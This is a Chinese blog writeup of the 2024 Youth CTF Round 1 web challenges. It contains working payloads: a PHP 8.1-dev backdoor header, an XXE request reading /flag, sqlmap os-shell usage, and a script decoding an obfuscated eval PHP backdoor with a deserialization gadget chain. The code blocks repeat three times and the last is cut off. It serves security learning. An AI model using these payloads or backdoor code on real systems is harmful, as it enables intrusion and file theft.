青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

前言

->Web方向

EasyMD5

图片[2],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

图片[3],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

burp抓包

随意上传提示pdf后缀我这里直接把type都改成pdf类型

图片[4],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

给了我们是否知道MD5 Collision

MD5 Collision可以是文件内容不同但MD5的值相同判断出我们需要上传两个MD5值相同的文件

图片[5],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

此时md5的值相同

图片[6],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

PHP的后门

图片[7],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

图片[8],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

图片[9],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

PHP 8.x的dev NSSround18的原题但比NSSround18简单的多,一步就出来

图片[10],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

POC


User-Agentt: zerodiumsystem("cat /flag");
User-Agentt: zerodiumsystem("cat /flag");
User-Agentt: zerodiumsystem("cat /flag");

PHP中的XXE

图片[11],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

打开

图片[12],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

这道题主要是通过引入外部DTD执行漏洞攻击

引入外部DTD执行代码唯一的考点是找到入口造成DTD的函数是simplexml_load_string用来接收xml所以我们需要访问该php路径来找到入口

POC


GET /simplexml_load_string.php HTTP/1.1
Host: challenge.qsnctf.com:31417
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 170
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
    <!ELEMENT name ANY >
    <!ENTITY xxe SYSTEM "file:///flag" >
]>
<root>
    <name>&xxe;</name>
</root>
GET /simplexml_load_string.php HTTP/1.1
Host: challenge.qsnctf.com:31417
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 170

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
    <!ELEMENT name ANY >
    <!ENTITY xxe SYSTEM "file:///flag" >
]>
<root>
    <name>&xxe;</name>
</root>
GET /simplexml_load_string.php HTTP/1.1
Host: challenge.qsnctf.com:31417
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 170

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
    <!ELEMENT name ANY >
    <!ENTITY xxe SYSTEM "file:///flag" >
]>
<root>
    <name>&xxe;</name>
</root>

图片[13],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

Easy_SQLI

图片[14],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

图片[15],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

使用sqlmap判断出时间盲注 ,sqlmap执行os-shell拿flag(类似青少年的靶场的一个sql注入原题

图片[16],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

雏形系统

图片[17],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

进去页面是一个登录框，那御剑扫一下目录发下www.zip备份文件，下载下来，源码如下

图片[18],青少年CTF擂台挑战赛 2024 #Round 1 Writeup,网络安全爱好者中心-神域博客网

根据题目描述，这应该是留下来的一个后门代码，只不过进行了加密，我们要先接出来，加密原理大概就是字符串的分割，然后动态调用的嵌套，我们只需按照他的加密原理一步一步的接，不过把eval改成echo输出出来源代码

网上搜索($O00OO0{6}.$O00OO0{33}.$O00OO0{30}.后门此处省略）的类似加密信息(可以搜索到解密过程

解密脚本如下:


<?php
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");//n1zb/ma5vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j
echo '第一步生成：',$O00OO0;
echo '<br /><br />********************************************************<br /><br />';
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}
.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}
.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
echo '第二步生成：',$O00O0O;
echo '<br /><br />********************************************************<br /><br />';
  
//上面解出来 $O00O0O=base64_decode;
//即然 $O00O0O=base64_decode那么把下面的代码改一下，eval是用来执行php代码，这里不需要执行，只需要解出php代码即可，那么去掉eavl 并把$O00O0O换成上面解出来的值
//eval ($O00O0O ("JE8wTzAwMD0iV0FLQ1JIbHdPdnh0cmRHVUxFbmFOSlBlamZGUXpaTUJjc29nSXVrYnBxWFR5bVZoU2lEWVpKUXlvaURPZEZXbl BZdFV2U2xmVEJleEt6a0dxVmhFSHdnTVhDdUFyUmFqTE5tcGJjSXNlSTlPZmlKVHlNdVR5TkROUXlvem8wbVVaTEJyVnlCWWVqMG N4Wm1xWGNEN0JpTTlYTmtxSExYQ1hObUxZeVg3WHlvNFF5b3pVUzlqbWt3Y3h0azRYRDByZDJtNGZhR2dRam45SUdnVHlLOCtYSj BRIjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT0 8wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
//修改后变成
echo '第三步生成：';
echo (base64_decode("JE8wTzAwMD0iS1hwSnRScmdxVU9IY0Zld3lvUFNXbkNidmtmTUlkbXh6c0VMWVpCVkdoRE51YUFUbFFqaVRhTWh5UUpVclpudHFlS0JzTndSY2ttbG9kVkFTWXBXeGpMRWJJZkNndk9GdWl6RFBHWEh3TzlCaXR6VFNtelVTZ0NzcXA5c2EzaFBxZzlzWWdQdUlzVUJURGpUbUh6VVNtZlhsZ2V4cXNmeGlnZFRTbXpVU3RqVFNtelVTbXpVU21mQlljaGppY0FVaGc1UEt0RzdtSHpVU216VVNtelVxdENIbGdQWFNtUUJiYUZ4bkJOVVNtelVTbXpVU3RmMWJwV01ic2ZwWWM1WFlnUG9sSGZWYTNRb1ozUXNpYzVrVG1QN21IelVTbXpVU216VVNtelVTbVEwaWdQeEVENXVJYXYwblhNR0RlTk5odFFOaWFBeXdrZnZxM0FNbkJOVVNtelVTbXpVU3QwVFNtelVTdDBUU216VVNnRmpiYUZ4U3RZb21IelVTbWY3bUh6VVNtelVTbXpVcXRDSGxnUFhTbVF4SWFVN21IelVTbXpVU216VXF0Q0hsZ1BYU21RdkkyWjdtSHpVU216VVNtelVxdENIbGdQWFNtUU1sa1FQbGtRTWwyNDdtSHpVU216VVNtelVxdENIbGdQWFNnSTFscEYwaWM5dVNlOVZJZ0N4WXRoMWIzR05UYWpUU216VVNtelVTbXpVU216VUljRk5sc3pIUmdkVUN0aDVTdEZQcXBQdmxnUDZJUmZGSVJMSG5CTlVTbXpVU216VVNtelVTbXpkWWd2TXFzMCtpYzV4cWdDWFltVU1uQk5VU216VVNtelVTdDBUU216VVNtelVTbWZwWWM1WFlnUG9sSGZNbGtGQkljRjBUbVA3bUh6VVNtelVTbXpVU216VVNnUHBUbVEwaWdQeEVENXhJYVU5d1JZSGwzZGtoSGJkWWd2TXFzMCtiY1lQd0Qwa0ljUGtpdFFQSWM0a1RHTlVTbXpVU216VVNtelVTbWY3bUh6VVNtelVTbXpVU216VVNtelVTbWZQYjJ2b1NtUTBpZ1B4RUQ1TWxrUVBsa1FNbDI0N21IelVTbXpVU216VVNtelVTdDBUU216VVNtelVTbXpVU216VUljRk5sc3pIOGgrSXZETDQ1bFRmOGgrU2pIUzdtSHpVU216VVNtelVWR05VU216VVZHTlRTbXpVU2dGamJhRnhTTFFQbGM4VFNtelVTdGpUU216VVNtelVTbWZCWWNoamljQVVoZ0w3bUh6VVNtelVTbXpVcTNRdllnUFhTZ0kxbHBGMGljOXVTZTlWYjJlamxlRjBiYVFNYnNVZGJjRjBpYzl1RW16ZElnOE1tSHpVU216VVNtelVLQk5VU216VVNtelVTbXpVU21ma2xnOUhiY0JVaGdTN21IelVTbXpVU216VVNtelVTbVFIVG1RZGwxakJhUmQ3bUh6VVNtelVTbXpVVkdOVVNtelVWR05UU216VVNtUUhTTzBVaGU5R0QxRlpjc1lCYmFGeFkyOXNJbVlZbkJOVVNtelVoZ0xVd1J6ZGExZndaMVFsaDNDeElhaHViYzFQaDEwN21IelVTbWZ6WWM1eElhaE1iY1dNS3BaTmhnTE1uQk5VU216VWljYlVUbWVNcTNGUFltVWRiSGRNU3RqVFNtelVTbXpVU21mUGIydm9TbVM5d0QwOXdEMDl3RDA5d0QwOXdEMDl3RDFHRGVOVVJjNUJZYUdVY2M5MXFIZm5iYzFQU0QwOXdEMDl3RDA5d0QwOXdEMDl3RDA5d1JTN21IelVTbWY5bUh6VVNtZk1JSFVkYkQwOWgyZWRsY1B1aHNicGhnUzl3UlNraXhlcFljdjFoM0FVWWdDeFltZmRJYzFvU0hkVFNtelVTdGpUU216VVNtelVTbWZQYjJ2b1RtRWtwbG9Qb0lhcEhoT1BITThIVERqVFNtelVTdDBUbUh6VVNtei93VT09IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
echo '<br /><br />********************************************************<br /><br />';
//上页那步输出来代码为：
/*
$O0O000="WAKCRHlwOvxtrdGULEnaNJPejfFQzZMBcsogIukbpqXTymVhSiDYZJQyoiDOdFWnPYtUvSlfTBexKzkGqVhEHwgMXCuArRajLNmpbcIseI9OfiJTyMuTyNDNQyozo0mUZLBrVyBYej0cxZmqXcD7BiM9XNkqHLXCXNmLYyX7Xyo4QyozUS9jmkwcxtk4XD0rd2m4faGgQjn9IGgTyK8+XJ0Q";
eval('?>'.$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0,$OO0000))));
*/
//同样，不需要eval，改成echo
$O0O000="WAKCRHlwOvxtrdGULEnaNJPejfFQzZMBcsogIukbpqXTymVhSiDYZJQyoiDOdFWnPYtUvSlfTBexKzkGqVhEHwgMXCuArRajLNmpbcIseI9OfiJTyMuTyNDNQyozo0mUZLBrVyBYej0cxZmqXcD7BiM9XNkqHLXCXNmLYyX7Xyo4QyozUS9jmkwcxtk4XD0rd2m4faGgQjn9IGgTyK8+XJ0Q";
echo '最终代码是：（这是我用htmlspecialchars函数把标签转换了）'.htmlspecialchars('?>'.$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0,$OO0000))));
  
?>
<?php
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");//n1zb/ma5vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j
echo '第一步生成：',$O00OO0;
echo '<br /><br />********************************************************<br /><br />';
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}
.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}
.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
echo '第二步生成：',$O00O0O;
echo '<br /><br />********************************************************<br /><br />';
  
//上面解出来 $O00O0O=base64_decode;
//即然 $O00O0O=base64_decode那么把下面的代码改一下，eval是用来执行php代码，这里不需要执行，只需要解出php代码即可，那么去掉eavl 并把$O00O0O换成上面解出来的值
//eval ($O00O0O ("JE8wTzAwMD0iV0FLQ1JIbHdPdnh0cmRHVUxFbmFOSlBlamZGUXpaTUJjc29nSXVrYnBxWFR5bVZoU2lEWVpKUXlvaURPZEZXbl BZdFV2U2xmVEJleEt6a0dxVmhFSHdnTVhDdUFyUmFqTE5tcGJjSXNlSTlPZmlKVHlNdVR5TkROUXlvem8wbVVaTEJyVnlCWWVqMG N4Wm1xWGNEN0JpTTlYTmtxSExYQ1hObUxZeVg3WHlvNFF5b3pVUzlqbWt3Y3h0azRYRDByZDJtNGZhR2dRam45SUdnVHlLOCtYSj BRIjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT0 8wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
//修改后变成
echo '第三步生成：';
echo (base64_decode("JE8wTzAwMD0iS1hwSnRScmdxVU9IY0Zld3lvUFNXbkNidmtmTUlkbXh6c0VMWVpCVkdoRE51YUFUbFFqaVRhTWh5UUpVclpudHFlS0JzTndSY2ttbG9kVkFTWXBXeGpMRWJJZkNndk9GdWl6RFBHWEh3TzlCaXR6VFNtelVTZ0NzcXA5c2EzaFBxZzlzWWdQdUlzVUJURGpUbUh6VVNtZlhsZ2V4cXNmeGlnZFRTbXpVU3RqVFNtelVTbXpVU21mQlljaGppY0FVaGc1UEt0RzdtSHpVU216VVNtelVxdENIbGdQWFNtUUJiYUZ4bkJOVVNtelVTbXpVU3RmMWJwV01ic2ZwWWM1WFlnUG9sSGZWYTNRb1ozUXNpYzVrVG1QN21IelVTbXpVU216VVNtelVTbVEwaWdQeEVENXVJYXYwblhNR0RlTk5odFFOaWFBeXdrZnZxM0FNbkJOVVNtelVTbXpVU3QwVFNtelVTdDBUU216VVNnRmpiYUZ4U3RZb21IelVTbWY3bUh6VVNtelVTbXpVcXRDSGxnUFhTbVF4SWFVN21IelVTbXpVU216VXF0Q0hsZ1BYU21RdkkyWjdtSHpVU216VVNtelVxdENIbGdQWFNtUU1sa1FQbGtRTWwyNDdtSHpVU216VVNtelVxdENIbGdQWFNnSTFscEYwaWM5dVNlOVZJZ0N4WXRoMWIzR05UYWpUU216VVNtelVTbXpVU216VUljRk5sc3pIUmdkVUN0aDVTdEZQcXBQdmxnUDZJUmZGSVJMSG5CTlVTbXpVU216VVNtelVTbXpkWWd2TXFzMCtpYzV4cWdDWFltVU1uQk5VU216VVNtelVTdDBUU216VVNtelVTbWZwWWM1WFlnUG9sSGZNbGtGQkljRjBUbVA3bUh6VVNtelVTbXpVU216VVNnUHBUbVEwaWdQeEVENXhJYVU5d1JZSGwzZGtoSGJkWWd2TXFzMCtiY1lQd0Qwa0ljUGtpdFFQSWM0a1RHTlVTbXpVU216VVNtelVTbWY3bUh6VVNtelVTbXpVU216VVNtelVTbWZQYjJ2b1NtUTBpZ1B4RUQ1TWxrUVBsa1FNbDI0N21IelVTbXpVU216VVNtelVTdDBUU216VVNtelVTbXpVU216VUljRk5sc3pIOGgrSXZETDQ1bFRmOGgrU2pIUzdtSHpVU216VVNtelVWR05VU216VVZHTlRTbXpVU2dGamJhRnhTTFFQbGM4VFNtelVTdGpUU216VVNtelVTbWZCWWNoamljQVVoZ0w3bUh6VVNtelVTbXpVcTNRdllnUFhTZ0kxbHBGMGljOXVTZTlWYjJlamxlRjBiYVFNYnNVZGJjRjBpYzl1RW16ZElnOE1tSHpVU216VVNtelVLQk5VU216VVNtelVTbXpVU21ma2xnOUhiY0JVaGdTN21IelVTbXpVU216VVNtelVTbVFIVG1RZGwxakJhUmQ3bUh6VVNtelVTbXpVVkdOVVNtelVWR05UU216VVNtUUhTTzBVaGU5R0QxRlpjc1lCYmFGeFkyOXNJbVlZbkJOVVNtelVoZ0xVd1J6ZGExZndaMVFsaDNDeElhaHViYzFQaDEwN21IelVTbWZ6WWM1eElhaE1iY1dNS3BaTmhnTE1uQk5VU216VWljYlVUbWVNcTNGUFltVWRiSGRNU3RqVFNtelVTbXpVU21mUGIydm9TbVM5d0QwOXdEMDl3RDA5d0QwOXdEMDl3RDFHRGVOVVJjNUJZYUdVY2M5MXFIZm5iYzFQU0QwOXdEMDl3RDA5d0QwOXdEMDl3RDA5d1JTN21IelVTbWY5bUh6VVNtZk1JSFVkYkQwOWgyZWRsY1B1aHNicGhnUzl3UlNraXhlcFljdjFoM0FVWWdDeFltZmRJYzFvU0hkVFNtelVTdGpUU216VVNtelVTbWZQYjJ2b1RtRWtwbG9Qb0lhcEhoT1BITThIVERqVFNtelVTdDBUbUh6VVNtei93VT09IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
echo '<br /><br />********************************************************<br /><br />';
//上页那步输出来代码为：
/*
$O0O000="WAKCRHlwOvxtrdGULEnaNJPejfFQzZMBcsogIukbpqXTymVhSiDYZJQyoiDOdFWnPYtUvSlfTBexKzkGqVhEHwgMXCuArRajLNmpbcIseI9OfiJTyMuTyNDNQyozo0mUZLBrVyBYej0cxZmqXcD7BiM9XNkqHLXCXNmLYyX7Xyo4QyozUS9jmkwcxtk4XD0rd2m4faGgQjn9IGgTyK8+XJ0Q";
eval('?>'.$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0,$OO0000))));
*/
//同样，不需要eval，改成echo
$O0O000="WAKCRHlwOvxtrdGULEnaNJPejfFQzZMBcsogIukbpqXTymVhSiDYZJQyoiDOdFWnPYtUvSlfTBexKzkGqVhEHwgMXCuArRajLNmpbcIseI9OfiJTyMuTyNDNQyozo0mUZLBrVyBYej0cxZmqXcD7BiM9XNkqHLXCXNmLYyX7Xyo4QyozUS9jmkwcxtk4XD0rd2m4faGgQjn9IGgTyK8+XJ0Q";
echo '最终代码是：（这是我用htmlspecialchars函数把标签转换了）'.htmlspecialchars('?>'.$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0,$OO0000))));
  
?>
<?php
$O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");//n1zb/ma5vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j
echo '第一步生成：',$O00OO0;
echo '<br /><br />********************************************************<br /><br />';
$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}
.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}
.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
echo '第二步生成：',$O00O0O;
echo '<br /><br />********************************************************<br /><br />';
  
//上面解出来 $O00O0O=base64_decode;
//即然 $O00O0O=base64_decode那么把下面的代码改一下，eval是用来执行php代码，这里不需要执行，只需要解出php代码即可，那么去掉eavl 并把$O00O0O换成上面解出来的值
//eval ($O00O0O ("JE8wTzAwMD0iV0FLQ1JIbHdPdnh0cmRHVUxFbmFOSlBlamZGUXpaTUJjc29nSXVrYnBxWFR5bVZoU2lEWVpKUXlvaURPZEZXbl BZdFV2U2xmVEJleEt6a0dxVmhFSHdnTVhDdUFyUmFqTE5tcGJjSXNlSTlPZmlKVHlNdVR5TkROUXlvem8wbVVaTEJyVnlCWWVqMG N4Wm1xWGNEN0JpTTlYTmtxSExYQ1hObUxZeVg3WHlvNFF5b3pVUzlqbWt3Y3h0azRYRDByZDJtNGZhR2dRam45SUdnVHlLOCtYSj BRIjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT0 8wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
//修改后变成
echo '第三步生成：';
echo (base64_decode("JE8wTzAwMD0iS1hwSnRScmdxVU9IY0Zld3lvUFNXbkNidmtmTUlkbXh6c0VMWVpCVkdoRE51YUFUbFFqaVRhTWh5UUpVclpudHFlS0JzTndSY2ttbG9kVkFTWXBXeGpMRWJJZkNndk9GdWl6RFBHWEh3TzlCaXR6VFNtelVTZ0NzcXA5c2EzaFBxZzlzWWdQdUlzVUJURGpUbUh6VVNtZlhsZ2V4cXNmeGlnZFRTbXpVU3RqVFNtelVTbXpVU21mQlljaGppY0FVaGc1UEt0RzdtSHpVU216VVNtelVxdENIbGdQWFNtUUJiYUZ4bkJOVVNtelVTbXpVU3RmMWJwV01ic2ZwWWM1WFlnUG9sSGZWYTNRb1ozUXNpYzVrVG1QN21IelVTbXpVU216VVNtelVTbVEwaWdQeEVENXVJYXYwblhNR0RlTk5odFFOaWFBeXdrZnZxM0FNbkJOVVNtelVTbXpVU3QwVFNtelVTdDBUU216VVNnRmpiYUZ4U3RZb21IelVTbWY3bUh6VVNtelVTbXpVcXRDSGxnUFhTbVF4SWFVN21IelVTbXpVU216VXF0Q0hsZ1BYU21RdkkyWjdtSHpVU216VVNtelVxdENIbGdQWFNtUU1sa1FQbGtRTWwyNDdtSHpVU216VVNtelVxdENIbGdQWFNnSTFscEYwaWM5dVNlOVZJZ0N4WXRoMWIzR05UYWpUU216VVNtelVTbXpVU216VUljRk5sc3pIUmdkVUN0aDVTdEZQcXBQdmxnUDZJUmZGSVJMSG5CTlVTbXpVU216VVNtelVTbXpkWWd2TXFzMCtpYzV4cWdDWFltVU1uQk5VU216VVNtelVTdDBUU216VVNtelVTbWZwWWM1WFlnUG9sSGZNbGtGQkljRjBUbVA3bUh6VVNtelVTbXpVU216VVNnUHBUbVEwaWdQeEVENXhJYVU5d1JZSGwzZGtoSGJkWWd2TXFzMCtiY1lQd0Qwa0ljUGtpdFFQSWM0a1RHTlVTbXpVU216VVNtelVTbWY3bUh6VVNtelVTbXpVU216VVNtelVTbWZQYjJ2b1NtUTBpZ1B4RUQ1TWxrUVBsa1FNbDI0N21IelVTbXpVU216VVNtelVTdDBUU216VVNtelVTbXpVU216VUljRk5sc3pIOGgrSXZETDQ1bFRmOGgrU2pIUzdtSHpVU216VVNtelVWR05VU216VVZHTlRTbXpVU2dGamJhRnhTTFFQbGM4VFNtelVTdGpUU216VVNtelVTbWZCWWNoamljQVVoZ0w3bUh6VVNtelVTbXpVcTNRdllnUFhTZ0kxbHBGMGljOXVTZTlWYjJlamxlRjBiYVFNYnNVZGJjRjBpYzl1RW16ZElnOE1tSHpVU216VVNtelVLQk5VU216VVNtelVTbXpVU21ma2xnOUhiY0JVaGdTN21IelVTbXpVU216VVNtelVTbVFIVG1RZGwxakJhUmQ3bUh6VVNtelVTbXpVVkdOVVNtelVWR05UU216VVNtUUhTTzBVaGU5R0QxRlpjc1lCYmFGeFkyOXNJbVlZbkJOVVNtelVoZ0xVd1J6ZGExZndaMVFsaDNDeElhaHViYzFQaDEwN21IelVTbWZ6WWM1eElhaE1iY1dNS3BaTmhnTE1uQk5VU216VWljYlVUbWVNcTNGUFltVWRiSGRNU3RqVFNtelVTbXpVU21mUGIydm9TbVM5d0QwOXdEMDl3RDA5d0QwOXdEMDl3RDFHRGVOVVJjNUJZYUdVY2M5MXFIZm5iYzFQU0QwOXdEMDl3RDA5d0QwOXdEMDl3RDA5d1JTN21IelVTbWY5bUh6VVNtZk1JSFVkYkQwOWgyZWRsY1B1aHNicGhnUzl3UlNraXhlcFljdjFoM0FVWWdDeFltZmRJYzFvU0hkVFNtelVTdGpUU216VVNtelVTbWZQYjJ2b1RtRWtwbG9Qb0lhcEhoT1BITThIVERqVFNtelVTdDBUbUh6VVNtei93VT09IjsgIAogICAgICAgIGV2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksICAgIAogICAgICAgICRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
echo '<br /><br />********************************************************<br /><br />';
//上页那步输出来代码为：
/*
$O0O000="WAKCRHlwOvxtrdGULEnaNJPejfFQzZMBcsogIukbpqXTymVhSiDYZJQyoiDOdFWnPYtUvSlfTBexKzkGqVhEHwgMXCuArRajLNmpbcIseI9OfiJTyMuTyNDNQyozo0mUZLBrVyBYej0cxZmqXcD7BiM9XNkqHLXCXNmLYyX7Xyo4QyozUS9jmkwcxtk4XD0rd2m4faGgQjn9IGgTyK8+XJ0Q";
eval('?>'.$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0,$OO0000))));
*/
//同样，不需要eval，改成echo
$O0O000="WAKCRHlwOvxtrdGULEnaNJPejfFQzZMBcsogIukbpqXTymVhSiDYZJQyoiDOdFWnPYtUvSlfTBexKzkGqVhEHwgMXCuArRajLNmpbcIseI9OfiJTyMuTyNDNQyozo0mUZLBrVyBYej0cxZmqXcD7BiM9XNkqHLXCXNmLYyX7Xyo4QyozUS9jmkwcxtk4XD0rd2m4faGgQjn9IGgTyK8+XJ0Q";
echo '最终代码是：（这是我用htmlspecialchars函数把标签转换了）'.htmlspecialchars('?>'.$O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0,$OO0000))));
  
?>

最后解密后拿到的就是


<?php error_reporting(0);
class shi {
    public $next;
    public $pass;
    public function __toString(){
        $this->next::PLZ($this->pass);
    }
}
class wo {
    public $sex;
    public $age;
    public $intention;
    public function __destruct(){
        echo "Hi Try serialize Me!";
        $this->inspect();
    }
    function inspect(){
        if($this->sex=='boy'&&$this->age=='eighteen') {
            echo $this->intention;
        }
        echo "🙅18岁🈲";
    }
}
class Demo {
    public $a;
    static function __callStatic($action, $do) {
        global $b;
        $b($do[0]); }
}
$b = $_POST['password']; 
$a = $_POST['username']; 
@unserialize($a); 
if (!isset($b)) { 
    echo "==================PLZ Input Your Name!=================="; } 
    if($a=='admin'&&$b=="'k1fuhu's test demo") {
         echo("登录成功"); 
        } ?>
<?php error_reporting(0);
class shi {
    public $next;
    public $pass;
    public function __toString(){
        $this->next::PLZ($this->pass);
    }
}
class wo {
    public $sex;
    public $age;
    public $intention;
    public function __destruct(){
        echo "Hi Try serialize Me!";
        $this->inspect();
    }
    function inspect(){
        if($this->sex=='boy'&&$this->age=='eighteen') {
            echo $this->intention;
        }
        echo "🙅18岁🈲";
    }
}
class Demo {
    public $a;
    static function __callStatic($action, $do) {
        global $b;
        $b($do[0]); }
}
$b = $_POST['password']; 
$a = $_POST['username']; 
@unserialize($a); 
if (!isset($b)) { 
    echo "==================PLZ Input Your Name!=================="; } 
    if($a=='admin'&&$b=="'k1fuhu's test demo") {
         echo("登录成功"); 
        } ?>
<?php error_reporting(0);
class shi {
    public $next;
    public $pass;
    public function __toString(){
        $this->next::PLZ($this->pass);
    }
}
